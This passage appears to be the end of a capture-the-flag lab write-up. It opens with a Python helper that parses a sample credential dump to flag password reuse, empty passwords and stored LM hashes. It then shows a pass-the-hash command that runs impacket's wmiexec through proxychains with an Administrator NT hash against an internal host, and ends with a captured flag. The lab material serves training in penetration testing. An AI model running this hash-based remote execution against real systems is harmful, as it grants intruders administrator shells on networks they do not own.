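DC$:1000:aad3b435b51404eeaad3b435b51404ee:cafebabecafebabecafebabecafebabe:::
[*] Kerberos keys grabbed
htb.local\\Administrator:aes256-cts-hmac-sha1-96:1111...
"""


def parse_dump(text):
    """Yield (user, rid, lm, nt) for every credential line; banners and keys are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["user"], int(m["rid"]), m["lm"], m["nt"]


def shared_passwords(text, include_machines=False):
    """Map each NT hash used by more than one account to the sorted account list.

    The hash is the grouping key, so reuse shows up even if nobody ever cracks
    the password. Machine accounts ($) and empty passwords are left out.
    """
    by_hash = defaultdict(set)
    for user, _rid, _lm, nt in parse_dump(text):
        if nt == EMPTY_NT or (user.endswith("$") and not include_machines):
            continue
        by_hash[nt].add(user)
    return {nt: sorted(u) for nt, u in by_hash.items() if len(u) > 1}


def weak_hygiene(text):
    """Accounts with an empty password or with a real LM hash still stored."""
    findings = []
    for user, _rid, lm, nt in parse_dump(text):
        if nt == EMPTY_NT:
            findings.append((user, "empty password"))
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored"))
    return findings


if __name__ == "__main__":
    for nt, users in shared_passwords(SAMPLE_DUMP).items():
        print(f"shared password (NT {nt[:8]}...): {', '.join(users)}")
    for user, issue in weak_hygiene(SAMPLE_DUMP):
        print(f"{user}: {issue}")
```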

proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned

Author – Puckiestyle